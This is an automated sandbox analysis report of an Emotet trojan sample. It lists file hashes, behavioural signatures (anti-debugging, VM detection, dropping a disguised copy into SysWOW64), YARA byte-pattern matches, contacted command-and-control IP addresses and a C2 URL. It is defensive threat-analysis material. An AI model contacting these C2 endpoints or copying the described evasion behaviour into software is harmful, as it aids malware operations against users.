Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report YF4dF4w2Cr

Overview

General Information

Sample Name:YF4dF4w2Cr (renamed file extension from none to exe)
Analysis ID:376398
MD5:f4d1470af3a7d82560b38558b132d468
SHA1:0c45cf4e32116eae8d73b52c140f5d91a19ee8ea
SHA256:6fa0dd6002d4b4e7ebabefc7f4f90f36fc53069e0cf4e845f683fb087d476e90
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Emotet e-Banking trojan
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Emotet
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • YF4dF4w2Cr.exe (PID: 6836 cmdline: 'C:\Users\user\Desktop\YF4dF4w2Cr.exe' MD5: F4D1470AF3A7D82560B38558B132D468)
    • YF4dF4w2Cr.exe (PID: 6856 cmdline: --5c8d8ab7 MD5: F4D1470AF3A7D82560B38558B132D468)
  • fwdrrebrand.exe (PID: 6912 cmdline: C:\Windows\SysWOW64\fwdrrebrand.exe MD5: F4D1470AF3A7D82560B38558B132D468)
    • fwdrrebrand.exe (PID: 6928 cmdline: --1cbc15eb MD5: F4D1470AF3A7D82560B38558B132D468)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.911351133.0000000000E71000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000003.00000002.911351133.0000000000E71000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
    • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 48 07 E8 00 85 C0
    • 0x50d4:$snippet6: 33 C0 21 05 FC 26 E8 00 A3 F8 26 E8 00 39 05 90 F3 E7 00 74 18 40 A3 F8 26 E8 00 83 3C C5 90 F3 ...
    00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
      • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 48 07 3F 02 85 C0
      • 0x50d4:$snippet6: 33 C0 21 05 FC 26 3F 02 A3 F8 26 3F 02 39 05 90 F3 3E 02 74 18 40 A3 F8 26 3F 02 83 3C C5 90 F3 ...
      00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.YF4dF4w2Cr.exe.22f053f.2.unpackMAL_Emotet_Jan20_1Detects Emotet malwareFlorian Roth
        • 0x2577:$op1: 03 FE 66 39 07 0F 85 2A FF FF FF 8B 4D F0 6A 20
        • 0x255d:$op2: 8B 7D FC 0F 85 49 FF FF FF 85 DB 0F 84 D1
        1.2.YF4dF4w2Cr.exe.22f053f.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
          1.2.YF4dF4w2Cr.exe.22f053f.2.unpackEmotetEmotet Payloadkevoreilly
          • 0x7ad:$snippet2: 6A 13 68 01 00 01 00 FF 15 48 07 41 00 85 C0
          • 0x48d4:$snippet6: 33 C0 21 05 FC 26 41 00 A3 F8 26 41 00 39 05 90 F3 40 00 74 18 40 A3 F8 26 41 00 83 3C C5 90 F3 ...
          2.2.fwdrrebrand.exe.e4053f.2.unpackMAL_Emotet_Jan20_1Detects Emotet malwareFlorian Roth
          • 0x2577:$op1: 03 FE 66 39 07 0F 85 2A FF FF FF 8B 4D F0 6A 20
          • 0x255d:$op2: 8B 7D FC 0F 85 49 FF FF FF 85 DB 0F 84 D1
          1.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpackMAL_Emotet_Jan20_1Detects Emotet malwareFlorian Roth
          • 0x3177:$op1: 03 FE 66 39 07 0F 85 2A FF FF FF 8B 4D F0 6A 20
          • 0x315d:$op2: 8B 7D FC 0F 85 49 FF FF FF 85 DB 0F 84 D1
          Click to see the 23 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: YF4dF4w2Cr.exeAvira: detected
          Multi AV Scanner detection for submitted fileShow sources
          Source: YF4dF4w2Cr.exeMetadefender: Detection: 41%Perma Link
          Source: YF4dF4w2Cr.exeReversingLabs: Detection: 86%
          Source: 1.2.YF4dF4w2Cr.exe.22f053f.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.YF4dF4w2Cr.exe.22f053f.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.0.fwdrrebrand.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.ddim
          Source: 0.0.YF4dF4w2Cr.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.ddim
          Source: 2.2.fwdrrebrand.exe.e4053f.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.0.YF4dF4w2Cr.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.ddim
          Source: 3.2.fwdrrebrand.exe.e4053f.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 3.0.fwdrrebrand.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.ddim
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023E207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,1_2_023E207B
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023E215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,1_2_023E215A
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023E1F11 CryptExportKey,1_2_023E1F11
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023E1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,1_2_023E1F75
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023E1F56 CryptGetHashParam,1_2_023E1F56
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023E1FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_023E1FFC
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E7207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,3_2_00E7207B
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E71FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,3_2_00E71FFC
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E71F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,3_2_00E71F75
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E71F11 CryptExportKey,3_2_00E71F11
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E71F56 CryptGetHashParam,3_2_00E71F56
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E7215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,3_2_00E7215A
          Source: YF4dF4w2Cr.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0042E202 lstrlenA,FindFirstFileA,FindClose,0_2_0042E202
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00429112 __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,0_2_00429112
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0042E202 lstrlenA,FindFirstFileA,FindClose,1_2_0042E202
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00429112 __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,1_2_00429112
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 200.55.168.82:20
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 70.32.94.58:8080
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 213.138.100.98:8080
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 144.76.62.10:8080
          Source: global trafficTCP traffic: 192.168.2.4:49752 -> 203.99.188.203:990
          Source: global trafficTCP traffic: 192.168.2.4:49753 -> 201.196.15.79:990
          Source: Joe Sandbox ViewIP Address: 190.117.206.153 190.117.206.153
          Source: unknownTCP traffic detected without corresponding DNS query: 190.117.206.153
          Source: unknownTCP traffic detected without corresponding DNS query: 190.117.206.153
          Source: unknownTCP traffic detected without corresponding DNS query: 190.117.206.153
          Source: unknownTCP traffic detected without corresponding DNS query: 203.99.187.137
          Source: unknownTCP traffic detected without corresponding DNS query: 203.99.187.137
          Source: unknownTCP traffic detected without corresponding DNS query: 203.99.187.137
          Source: unknownTCP traffic detected without corresponding DNS query: 200.55.168.82
          Source: unknownTCP traffic detected without corresponding DNS query: 200.55.168.82
          Source: unknownTCP traffic detected without corresponding DNS query: 200.55.168.82
          Source: unknownTCP traffic detected without corresponding DNS query: 70.32.94.58
          Source: unknownTCP traffic detected without corresponding DNS query: 70.32.94.58
          Source: unknownTCP traffic detected without corresponding DNS query: 70.32.94.58
          Source: unknownTCP traffic detected without corresponding DNS query: 213.138.100.98
          Source: unknownTCP traffic detected without corresponding DNS query: 213.138.100.98
          Source: unknownTCP traffic detected without corresponding DNS query: 213.138.100.98
          Source: unknownTCP traffic detected without corresponding DNS query: 144.76.62.10
          Source: unknownTCP traffic detected without corresponding DNS query: 144.76.62.10
          Source: unknownTCP traffic detected without corresponding DNS query: 144.76.62.10
          Source: unknownTCP traffic detected without corresponding DNS query: 203.99.188.203
          Source: unknownTCP traffic detected without corresponding DNS query: 203.99.188.203
          Source: unknownTCP traffic detected without corresponding DNS query: 203.99.188.203
          Source: unknownTCP traffic detected without corresponding DNS query: 201.196.15.79
          Source: unknownTCP traffic detected without corresponding DNS query: 201.196.15.79
          Source: unknownTCP traffic detected without corresponding DNS query: 201.196.15.79
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E71383 InternetReadFile,3_2_00E71383
          Source: fwdrrebrand.exe, 00000003.00000002.911061816.0000000000199000.00000004.00000001.sdmpString found in binary or memory: http://201.196.15.79/pnp/splash/loadan/merge/
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: YF4dF4w2Cr.exe, 00000000.00000002.646439364.00000000007DA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00424B11 GetKeyState,GetKeyState,GetKeyState,0_2_00424B11
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0042EEC9 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,0_2_0042EEC9
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0040F3F3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_0040F3F3
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0040963B SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,0_2_0040963B
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00421E22 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,0_2_00421E22
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00424B11 GetKeyState,GetKeyState,GetKeyState,1_2_00424B11
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0042EEC9 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,1_2_0042EEC9
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0040F3F3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_0040F3F3
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0040963B SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,1_2_0040963B
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00421E22 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,1_2_00421E22

          E-Banking Fraud:

          barindex
          Detected Emotet e-Banking trojanShow sources
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023ED2291_2_023ED229
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E7D2293_2_00E7D229
          Yara detected EmotetShow sources
          Source: Yara matchFile source: 00000003.00000002.911351133.0000000000E71000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.911329225.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.658516120.0000000000E51000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.658502869.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.YF4dF4w2Cr.exe.22f053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fwdrrebrand.exe.e4053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.YF4dF4w2Cr.exe.22f053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.fwdrrebrand.exe.e4053f.2.unpack, type: UNPACKEDPE
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023E1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,1_2_023E1F75
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E71F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,3_2_00E71F75

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.911351133.0000000000E71000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
          Source: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
          Source: 00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
          Source: 00000003.00000002.911329225.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
          Source: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
          Source: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
          Source: 00000002.00000002.658516120.0000000000E51000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
          Source: 00000002.00000002.658502869.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
          Source: 1.2.YF4dF4w2Cr.exe.22f053f.2.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
          Source: 2.2.fwdrrebrand.exe.e4053f.2.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
          Source: 1.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
          Source: 1.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet Author: ReversingLabs
          Source: 0.2.YF4dF4w2Cr.exe.22f053f.2.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
          Source: 3.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
          Source: 3.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet Author: ReversingLabs
          Source: 2.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
          Source: 2.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet Author: ReversingLabs
          Source: 0.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
          Source: 0.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet Author: ReversingLabs
          Source: 3.2.fwdrrebrand.exe.e4053f.2.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023ED3F5 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,1_2_023ED3F5
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023E1D2B CreateProcessAsUserW,CreateProcessW,1_2_023E1D2B
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeFile deleted: C:\Windows\SysWOW64\fwdrrebrand.exe:Zone.IdentifierJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_004110C40_2_004110C4
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_004034700_2_00403470
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_004322860_2_00432286
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_004445DA0_2_004445DA
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0043A5F00_2_0043A5F0
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0043265A0_2_0043265A
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0043C6990_2_0043C699
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_004468E10_2_004468E1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00432A660_2_00432A66
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00444B1E0_2_00444B1E
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00432E860_2_00432E86
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_004450620_2_00445062
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0042B39D0_2_0042B39D
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0044575A0_2_0044575A
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00431DB10_2_00431DB1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_022F28C10_2_022F28C1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_022F30E80_2_022F30E8
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_022F30E40_2_022F30E4
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_023137A50_2_023137A5
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_023137A90_2_023137A9
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_02312F820_2_02312F82
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_004110C41_2_004110C4
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_004034701_2_00403470
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_004322861_2_00432286
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_004445DA1_2_004445DA
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0043A5F01_2_0043A5F0
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0043265A1_2_0043265A
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0043C6991_2_0043C699
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_004468E11_2_004468E1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00432A661_2_00432A66
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00444B1E1_2_00444B1E
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00432E861_2_00432E86
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_004450621_2_00445062
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0042B39D1_2_0042B39D
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0044575A1_2_0044575A
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00431DB11_2_00431DB1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_022F28C11_2_022F28C1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_022F30E81_2_022F30E8
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_022F30E41_2_022F30E4
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023E37A91_2_023E37A9
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023E37A51_2_023E37A5
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023E2F821_2_023E2F82
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E430E42_2_00E430E4
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E430E82_2_00E430E8
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E428C12_2_00E428C1
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E537A52_2_00E537A5
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E537A92_2_00E537A9
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E52F822_2_00E52F82
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E430E43_2_00E430E4
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E430E83_2_00E430E8
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E428C13_2_00E428C1
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E737A53_2_00E737A5
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E737A93_2_00E737A9
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E72F823_2_00E72F82
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: String function: 00431A9B appears 430 times
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: String function: 004015A0 appears 56 times
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: String function: 00439FE5 appears 52 times
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: String function: 00431818 appears 142 times
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: String function: 00431ACE appears 50 times
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: String function: 00401170 appears 34 times
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: String function: 0041F363 appears 42 times
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: String function: 00431B04 appears 52 times
          Source: YF4dF4w2Cr.exe, 00000000.00000002.646492673.00000000022D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs YF4dF4w2Cr.exe
          Source: YF4dF4w2Cr.exe, 00000001.00000002.659892079.0000000002710000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs YF4dF4w2Cr.exe
          Source: YF4dF4w2Cr.exe, 00000001.00000002.659567664.00000000022D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs YF4dF4w2Cr.exe
          Source: YF4dF4w2Cr.exe, 00000001.00000002.659959901.0000000002770000.00000002.00000001.sdmpBinary or memory string: originalfilename vs YF4dF4w2Cr.exe
          Source: YF4dF4w2Cr.exe, 00000001.00000002.659959901.0000000002770000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs YF4dF4w2Cr.exe
          Source: YF4dF4w2Cr.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: 00000003.00000002.911351133.0000000000E71000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: 00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: 00000003.00000002.911329225.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: 00000002.00000002.658516120.0000000000E51000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: 00000002.00000002.658502869.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: 1.2.YF4dF4w2Cr.exe.22f053f.2.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
